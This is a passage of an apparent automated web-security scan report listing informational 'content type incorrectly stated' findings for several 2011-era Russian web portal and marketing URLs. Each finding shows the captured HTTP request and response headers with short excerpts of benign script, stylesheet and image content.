User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:58 GMT
Content-Type: text/plain
Connection: keep-alive
Keep-Alive: timeout=20
Last-Modified: Tue, 14 Apr 2009 09:21:09 GMT
ETag: "15d8393-66f-49e45585"
Accept-Ranges: bytes
Content-Length: 1647

...{widgets:{
0:{name:'...... ........',type:'gameboss',url_id:'80'},
1:{name:'........................ ........ ........',type:'r4games',url_id:'',par_1:''},
2:{name:'............ - ef the game',t
...[SNIP]...

33.38. http://my.webalta.ru/public/engine/fw/fw_cookies.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/fw/fw_cookies.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/fw/fw_cookies.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:30 GMT
Content-Type: application/x-javascript
Content-Length: 2347
Last-Modified: Wed, 12 Nov 2008 09:08:15 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:30 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function setCookie( name, value, path ) {

var expdate = new Date ();
expdate.setTime(expdate.getTime() + (3650 * 24 * 60 * 60 * 1000));
var str2 = "expires=" + expdate.toGMTString();
var
...[SNIP]...

33.39. http://my.webalta.ru/public/engine/move.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/move.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/move.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:51 GMT
Content-Type: application/x-javascript
Content-Length: 34213
Last-Modified: Wed, 26 Nov 2008 08:04:50 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:51 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function setOpacity(value) {
testObj.style.opacity = value/10;
testObj.style.filter = 'alpha(opacity=' + value*10 + ')';
}


function hasClassName(elem, cname)
{
if (!elem) return
...[SNIP]...

33.40. http://my.webalta.ru/public/engine/page.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/page.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/page.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: application/x-javascript
Content-Length: 28424
Last-Modified: Tue, 23 Dec 2008 15:25:56 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:30:07 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function $(e_id)
{
return document.getElementById(e_id);
}

function create_El(s_div,s_parent,s_id,s_width,s_height,s_top,s_left,s_visibility,s_class,s_html)
{//................ .........
...[SNIP]...

33.41. http://my.webalta.ru/public/engine/reader.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/reader.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/reader.js?version=1.1 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:29:23 GMT
Content-Type: application/x-javascript
Content-Length: 15804
Last-Modified: Tue, 09 Dec 2008 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:29:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...var __reader = new rssReader();

// ............ ...................... ...... ............. .......... ........................ ...... ............ ...........
var __parser = new Object();

_
...[SNIP]...

33.42. http://my.webalta.ru/public/engine/settings.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/settings.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/settings.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:12 GMT
Content-Type: application/x-javascript
Content-Length: 3396
Last-Modified: Tue, 23 Dec 2008 15:27:11 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:12 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...
var fw={};var block={};var page={}; var page_load={}; var block_prop={};var g_st={};
var save_key = false;
function f_new(name)
{
       this.Modules={};
   
}
var Catalog = {};
var Catalog_ =
...[SNIP]...

33.43. http://my.webalta.ru/public/engine/skinpacks.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/skinpacks.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/skinpacks.js?version=1.0 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:26:46 GMT
Content-Type: application/x-javascript
Content-Length: 2349
Last-Modified: Mon, 24 Nov 2008 13:34:42 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:26:46 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...var __skinpack = new skinPacks();
//__skinpack.apply();

function skinPacks()
{
   this.theme_color = '#52677A';

   this.bg_top_color = '#fff';
   this.bg_top_img = '/public/visual/theme/top/top
...[SNIP]...

33.44. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...

33.45. http://my.webalta.ru/public/engine/widget/browse/widget_script.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/widget/browse/widget_script.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/browse/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:33 GMT
Content-Type: application/x-javascript
Content-Length: 2882
Last-Modified: Mon, 22 Dec 2008 08:59:36 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:33 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function browse_fNewBlock_2()
{    
       // .............. ..........
   function _options()
   {
       return '';
       var id = this.d.b_index;
       var html = '';

           html += '<div id="' + id + '_options" s
...[SNIP]...

33.46. http://my.webalta.ru/public/engine/widget/flash/widget_script.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/widget/flash/widget_script.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/flash/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: application/x-javascript
Content-Length: 5003
Last-Modified: Wed, 12 Nov 2008 09:08:18 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function flash_f_new_block_2(id_block)
{    

   // ID ..............
   this.d._id = id_block;

   // ..........................
   function init()
   {
       var el = document.getElementById(this.name_bl
...[SNIP]...

33.47. http://my.webalta.ru/public/engine/widget/gameboss/widget_script.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/widget/gameboss/widget_script.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/gameboss/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: application/x-javascript
Content-Length: 6277
Last-Modified: Fri, 21 Nov 2008 06:52:06 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function gameboss_fNewBlock_2()
{    
   function fLdrReceive(txt)
       {

           txt=txt.replace(/<\?xml.*?>/g, " ");
           txt=txt.replace(/<img.*?>/g, " ");
           txt=txt.replace(/&lt;.*?&gt;/g, " ");
           
...[SNIP]...

33.48. http://my.webalta.ru/public/engine/widget/labpixies/widget_script.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/widget/labpixies/widget_script.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/labpixies/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:31:57 GMT
Content-Type: application/x-javascript
Content-Length: 2358
Last-Modified: Mon, 24 Nov 2008 13:40:39 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:31:57 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function labpixies_fNewBlock_2()
{    
   function fLdrReceive(txt)
       {        
           function substring(at, to, str)
       {
               start_pos = str.indexOf(at) + at.length;
               pars = str.substr(start_pos);
       
...[SNIP]...

33.49. http://my.webalta.ru/public/visual/index.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/visual/index.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/visual/index.css HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:25:00 GMT
Content-Type: text/css
Content-Length: 9788
Last-Modified: Wed, 12 Nov 2008 09:09:11 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:25:00 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

/*
   ......... ......
   ...... .... .. ......... .. index.html
   ......... ..........: 08.11.08
   ...., .........., .. ..... .... .... ... .....

*/

body { min-width: 600px; padding: 0px; margi
...[SNIP]...

33.50. http://my.webalta.ru/public/visual/theme.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/visual/theme.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/visual/theme.css HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:25:12 GMT
Content-Type: text/css
Content-Length: 2449
Last-Modified: Tue, 18 Nov 2008 16:11:07 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:25:12 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

/*
   ............ ......
   ..... ........ . ........... .. ...., .. .. ......... ............ ...
   ......... ..........: 09.11.08
   ...., .........., .. ..... .... .... ... .....

*/

/* .... ..
...[SNIP]...

33.51. http://my.webalta.ru/public/visual/themes/css.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/visual/themes/css.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /public/visual/themes/css.php?st=theme1 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:19 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 170

.../* .... .....
*/
.theme_header { background: #7A96A7 url("/public/visual/themes/theme1/top.png"); }

/* .... ....
*/
.theme_body { background: #52677A; }

33.52. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2208&ref2=elqNone&tzo=360&ms=121 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

33.53. http://pogoda.webalta.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pogoda.webalta.ru
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:23:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Feb 2011 08:10:09 GMT
ETag: "da2ac4-37e-49b70691d1a40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

33.54. http://pogoda.webalta.ru/public/css/style-weather.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pogoda.webalta.ru
Path:   /public/css/style-weather.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-weather.css?v1 HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 11 Mar 2011 18:53:44 GMT
ETag: "8680f0-1c05-49e397b315e00"
Accept-Ranges: bytes
Content-Length: 7173
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...

33.55. http://pogoda.webalta.ru/public/js/search.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pogoda.webalta.ru
Path:   /public/js/search.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/search.js?v1 HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:21:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Mar 2011 16:38:58 GMT
ETag: "8680d8-1c05-49e8810984c80"
Accept-Ranges: bytes
Content-Length: 7173
Connection: close
Content-Type: application/x-javascript

var my_sender = new sack("/zajax_search.php");
var city_sender = new sack("/zajax_set.php");

var seachBgOn = "#afdfff";
var seachBgOff = "#f2f6ff";

var search_sending = false;
var positioned
...[SNIP]...

33.56. http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://smiimg.dt00.net
Path:   /smi/2011/04/20110414khlopin-75x75.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /smi/2011/04/20110414khlopin-75x75.jpg HTTP/1.1
Host: smiimg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 5395
Last-Modified: Thu, 14 Apr 2011 07:52:39 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:21:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

GIF87aK.K.....
